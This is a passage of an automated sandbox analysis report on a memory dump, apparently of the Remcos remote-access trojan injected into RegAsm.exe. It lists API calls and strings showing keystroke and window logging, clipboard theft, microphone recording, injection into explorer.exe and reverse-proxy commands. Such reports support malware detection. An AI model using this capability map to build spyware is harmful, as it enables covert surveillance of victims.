                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                  • String ID: H
                                                                  • API String ID: 4237864984-2852464175
                                                                  • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                  • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                                  • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                  • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                                  • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                                  • __alloca_probe_16.LIBCMT ref: 00453F94
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                                  • __freea.LIBCMT ref: 00454003
                                                                  • __freea.LIBCMT ref: 0045400F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                  • String ID: \@E
                                                                  • API String ID: 201697637-1814623452
                                                                  • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                                  • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                                  • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                                  • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID: \&G$\&G$`&G
                                                                  • API String ID: 269201875-253610517
                                                                  • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                                  • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                                  • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                                  • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 65535$udp
                                                                  • API String ID: 0-1267037602
                                                                  • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                  • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                                  • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                  • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 0040AD38
                                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                                                  • GetForegroundWindow.USER32 ref: 0040AD49
                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040AD86
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                                                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                  • API String ID: 911427763-3954389425
                                                                  • Opcode ID: 1fd890e2d21f894b0b3b077f7e4e96656cdfff5721ec9a02ea1a5f8763c76f61
                                                                  • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                                                  • Opcode Fuzzy Hash: 1fd890e2d21f894b0b3b077f7e4e96656cdfff5721ec9a02ea1a5f8763c76f61
                                                                  • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                                  • __dosmaperr.LIBCMT ref: 0043A8A6
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                                  • __dosmaperr.LIBCMT ref: 0043A8E3
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                                  • __dosmaperr.LIBCMT ref: 0043A937
                                                                  • _free.LIBCMT ref: 0043A943
                                                                  • _free.LIBCMT ref: 0043A94A
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                  • String ID:
                                                                  • API String ID: 2441525078-0
                                                                  • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                                  • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                                  • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                                  • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Eventinet_ntoa
                                                                  • String ID: 0If$GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                  • API String ID: 3578746661-1260572883
                                                                  • Opcode ID: 1770ec6c0f5e3b286ceab69ad4fea226e85cf303756d03bb6ed0006363607c11
                                                                  • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                                  • Opcode Fuzzy Hash: 1770ec6c0f5e3b286ceab69ad4fea226e85cf303756d03bb6ed0006363607c11
                                                                  • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                                  APIs
                                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                  • GetMessageA.USER32 ref: 0040556F
                                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                  • API String ID: 2956720200-749203953
                                                                  • Opcode ID: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
                                                                  • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                                  • Opcode Fuzzy Hash: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
                                                                  • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                                  APIs
                                                                    • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                  • String ID: 0VG$0VG$<$@$Temp
                                                                  • API String ID: 1704390241-2575729100
                                                                  • Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                                                                  • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                                  • Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                                                                  • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                                  APIs
                                                                  • OpenClipboard.USER32 ref: 00416941
                                                                  • EmptyClipboard.USER32 ref: 0041694F
                                                                  • CloseClipboard.USER32 ref: 00416955
                                                                  • OpenClipboard.USER32 ref: 0041695C
                                                                  • GetClipboardData.USER32 ref: 0041696C
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                  • CloseClipboard.USER32 ref: 00416984
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                  • String ID: !D@
                                                                  • API String ID: 2172192267-604454484
                                                                  • Opcode ID: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                                                                  • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                                  • Opcode Fuzzy Hash: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                                                                  • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                                  APIs
                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                  • CloseHandle.KERNEL32(?), ref: 00413465
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                  • String ID:
                                                                  • API String ID: 297527592-0
                                                                  • Opcode ID: c8607eadb7f648cd119cf038169f51a0334e47929f95f9aa533bbd49f0d75183
                                                                  • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                  • Opcode Fuzzy Hash: c8607eadb7f648cd119cf038169f51a0334e47929f95f9aa533bbd49f0d75183
                                                                  • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                  • String ID:
                                                                  • API String ID: 221034970-0
                                                                  • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                                  • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                                  • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                                  • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00448135
                                                                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                  • _free.LIBCMT ref: 00448141
                                                                  • _free.LIBCMT ref: 0044814C
                                                                  • _free.LIBCMT ref: 00448157
                                                                  • _free.LIBCMT ref: 00448162
                                                                  • _free.LIBCMT ref: 0044816D
                                                                  • _free.LIBCMT ref: 00448178
                                                                  • _free.LIBCMT ref: 00448183
                                                                  • _free.LIBCMT ref: 0044818E
                                                                  • _free.LIBCMT ref: 0044819C
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                  • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                                  • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                  • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                                  APIs
                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DecodePointer
                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                  • API String ID: 3527080286-3064271455
                                                                  • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                  • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                                  • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                  • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                  • Sleep.KERNEL32(00000064), ref: 00417521
                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                  • API String ID: 1462127192-2001430897
                                                                  • Opcode ID: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
                                                                  • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                                  • Opcode Fuzzy Hash: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
                                                                  • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentProcess
                                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                  • API String ID: 2050909247-4242073005
                                                                  • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                                                  • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                                  • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                                                  • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                                  APIs
                                                                  • _strftime.LIBCMT ref: 00401D50
                                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                  • API String ID: 3809562944-243156785
                                                                  • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                                                  • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                                  • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                                                  • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                                  • int.LIBCPMT ref: 00410E81
                                                                    • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                    • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                  • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                                  • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                  • String ID: ,kG$0kG
                                                                  • API String ID: 3815856325-2015055088
                                                                  • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                                  • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                                  • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                                  • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                                  APIs
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                  • waveInStart.WINMM ref: 00401CFE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                  • String ID: dMG$|MG$PG
                                                                  • API String ID: 1356121797-532278878
                                                                  • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                                  • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                                  • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                                  • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                    • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                                                                    • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                                                                    • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                  • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                  • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                                  • GetMessageA.USER32 ref: 0041D500
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                  • String ID: Remcos
                                                                  • API String ID: 1970332568-165870891
                                                                  • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                  • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                                  • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                  • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                                  • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
